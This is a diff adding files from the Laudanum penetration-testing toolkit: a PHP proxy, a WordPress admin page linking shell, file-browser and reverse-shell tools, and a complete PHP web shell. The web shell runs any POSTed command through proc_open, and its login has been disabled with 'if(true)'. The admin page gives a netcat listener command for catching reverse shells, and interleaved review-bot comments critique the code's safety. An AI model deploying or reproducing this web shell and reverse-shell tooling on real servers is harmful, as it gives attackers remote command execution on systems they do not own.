$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
//rewrite form - hard linked
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
//rewrite form - relative reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
return $r;
/* Initialize some variables we need again and again. */
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
if ($url == "") {
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
if ($url == "") {
<title>Laudanum PHP Proxy</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
<body onload="init()">
<h1>Laudanum PHP Proxy</h1>
<form method="GET" name="proxy">
<input type="text" name="laudurl" size="70">
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
} else {
$url_c = geturlarray($url);
$params = array_merge($_GET, $_POST);
//don't pass throught the parameter we are using
//create the query or post parameters
$query = http_build_query($params);
if ($query != "") {
$url_c["query"] = $query;
//get the files
$fp = fopen(buildurl($url_c), "rb");
// use the headers, except the response code which is popped off the array
$headers = $http_response_header;
// pop
// fix cookies
$headers = rewritecookies($headers);
$ctype = getcontenttype($headers);
$cencoding = getcontentencoding($headers);
// we will remove gzip encoding later, but we need to remove the header now
// before it is added to the response.
if ($cencoding == "gzip")
$headers = removeheader("Content-Encoding", $headers);
// set headers for response to client
if (preg_match("/text|image/", $ctype)) {
// the number of headers can change due to replacement
$i = 0;
while ($i < count($headers)) {
if (strpos($headers[$i], "Set-Cookie:") == false)
// replace headers
header($headers[$i], true);
// if it is the first cookie, replace all the others. Otherwise add
header($headers[$i], false);
} else {
header("Content-Disposition: attachment; filename=" . getfilename($url_c));
// get data
if (preg_match("/text/",$ctype)) { //text
//it is a text format: html, css, js
$data = "";
while (!feof($fp)) {
$data .= fgets($fp, 4096);
// uncompress it so it can be rewritten
if ($cencoding == "gzip")
$data = compatible_gzinflate($data);
// rewrite all the links and such
echo rewrite($data, $url_c);
} else {
// binary format or something similar, let it go through


@ -0,0 +1,67 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides a convenient menu of Laudanum tools from a Word Press settings
*** page.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
<div class="wrap">
<h2>Laudanum Tools</h2>
<li><a href="<?php echo plugins_url('shell.php', __FILE__);?>">Shell</a> </li>
<li><a href="<?php echo plugins_url('dns.php', __FILE__);?>">DNS</a> </li>
<li><a href="<?php echo plugins_url('host.php', __FILE__);?>">Host Lookup</a> </li>
<li><a href="<?php echo plugins_url('file.php', __FILE__);?>">File Browser</a> </li>
<li><a href="<?php echo plugins_url('proxy.php', __FILE__);?>">Proxy</a> </li>
<li>Reverse Shell -
<form action="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>" method="post">
IP: <input name="ip" type="text" value="">
Port: <input name="port" type="text" value="8888">
<input type="submit" value="Connect"></p>
<!--<li><a href="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>">Reverse Shell (requires hard-coded config)</a> </li>-->
<li><a href="<?php echo plugins_url('killnc.php', __FILE__);?>">kill nc (recover if nc screws up your shell)</a> </li>
* for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888"
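Review bot: Every `plugins_url()` result in this template is echoed straight into an `href` or `action` attribute; WordPress convention is to escape at the point of output, e.g. `<a href="<?php echo esc_url( plugins_url('shell.php', __FILE__) ); ?>">`. The reverse-shell form also posts `ip` and `port` without a nonce field, so the handler has no way to tell a deliberate submission from a forged cross-site one. Adding `<?php wp_nonce_field('laudanum_reverse_shell'); ?>` inside the form (the action name is illustrative) only helps if php-reverse-shell.php verifies it, and that file is outside this section.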


@ -0,0 +1,389 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides shell access to the system. It is built based on the 2.1
*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
*** <mgeisler[at]mgeisler.net>
*** Updated by Tim Medin
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Shell Access</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a
href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
// set_error_handler('wpl_error_handler');
function logout() {
$_SESSION = array('authenticated' => false);
if (isset($_COOKIE[session_name()]))
setcookie(session_name(), '', time()-42000, '/');
function wpl_stripslashes_deep($value) {
if (is_array($value))
return array_map('stripslashes_deep', $value);
return stripslashes($value);
if (get_magic_quotes_gpc())
$_POST = stripslashes_deep($_POST);
/* Initialize some variables we need again and again. */
//$username = isset($_POST['username']) ? $_POST['username'] : '';
//$password = isset($_POST['password']) ? $_POST['password'] : '';
//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
$command = isset($_POST['command']) ? $_POST['command'] : '';
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
///* Default settings --- these settings should always be set to something. */
//$default_settings = array('home-directory' => '.');
///* Merge settings. */
//$ini['settings'] = array_merge($default_settings, $ini['settings']);
/* Delete the session data if the user requested a logout. This leaves the
* session cookie at the user, but this is not important since we
* authenticates on $_SESSION['authenticated']. */
if (isset($_POST['logout']))
///* Attempt authentication. */
//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
// isset($ini['users'][$username])) {
// if (strchr($ini['users'][$username], ':') === false) {
// // No seperator found, assume this is a password in clear text.
// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
// } else {
// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
// }
/* Attempt authentication. */
if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
$_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
/* Enforce default non-authenticated state if the above code didn't set it
* already. */
if (!isset($_SESSION['authenticated']))
$_SESSION['authenticated'] = false;
if(true) {
//if ($_SESSION['authenticated']) {
/* Initialize the session variables. */
if (empty($_SESSION['cwd'])) {
$_SESSION['cwd'] = '.';
$_SESSION['history'] = array();
$_SESSION['output'] = '';
if (!empty($command)) {
/* Save the command for late use in the JavaScript. If the command is
* already in the history, then the old entry is removed before the
* new entry is put into the list at the front. */
if (($i = array_search($command, $_SESSION['history'])) !== false)
array_unshift($_SESSION['history'], $command);
/* Now append the commmand to the output. */
$_SESSION['output'] .= '$ ' . $command . "\n";
/* Initialize the current working directory. */
if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
} elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
} elseif (trim($command) == 'exit') {
} else {
/* The command is not an internal command, so we execute it after
* changing the directory and save the output. */
// We canot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advice programs (ls for example) of the terminal size.
putenv('ROWS=' . $rows);
putenv('COLUMNS=' . $columns);
/* Alias expansion. */
$length = strcspn($command, " \t");
$token = substr($command, 0, $length);
if (isset($ini['aliases'][$token]))
$command = $ini['aliases'][$token] . substr($command, $length);
$io = array();
$p = proc_open($command,
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
<title>Laudanum Shell</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
<?php if (true) { ?>
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
document.shell.command.value = command_hist[current_line];
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
document.shell.command.value = command_hist[current_line];
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
<?php } else { ?>
function init() {
<?php } ?>
<body onload="init()">
<h1>Laudanum Shell</h1>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
if (false) {
/* Genereate a new nounce every time we preent the login page. This binds
* each login to a unique hit on the server and prevents the simple replay
* attack where one uses the back button in the browser to replay the POST
* data from a login. */
$_SESSION['nounce'] = mt_rand();
if (false)
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
echo " <p>Please login:</p>\n";
<p>Username: <input name="username" type="text" value="<?php echo $username
<p>Password: <input name="password" type="password"></p>
<p><input type="submit" value="Login"></p>
<input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">
<?php } else { /* Authenticated. */ ?>
<legend>Current Working Directory: <code><?php
echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
<div id="terminal">
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
<p id="prompt">
$&nbsp;<input name="command" type="text"
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
<span style="float: right">Size: <input type="text" name="rows" size="2"
maxlength="3" value="<?php echo $rows ?>"> &times; <input type="text"
name="columns" size="2" maxlength="3" value="<?php echo $columns
<input type="submit" value="Execute Command">
<input type="submit" name="logout" value="Logout">
<?php } ?>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Updated by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
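Review bot: With the session check replaced by `if(true) {` and the login form placed behind `if (false) {`, the only gate left in front of `proc_open($command, ...)` is `include 'ipcheck.php';`, which presumably holds the address allow-list. `include` only warns and carries on when the file is missing or unreadable, so the page fails open; `require 'ipcheck.php';` would abort the request instead. The leftover authentication block still reads `$nounce`, `$username`, `$password` and `$users`, whose assignments are commented out above, so it should be removed or restored as a whole. Separately, `wpl_stripslashes_deep` recurses through `array_map('stripslashes_deep', $value)` and the caller invokes `stripslashes_deep($_POST)`; both should use the renamed `wpl_stripslashes_deep` unless ipcheck.php, not shown here, loads WordPress.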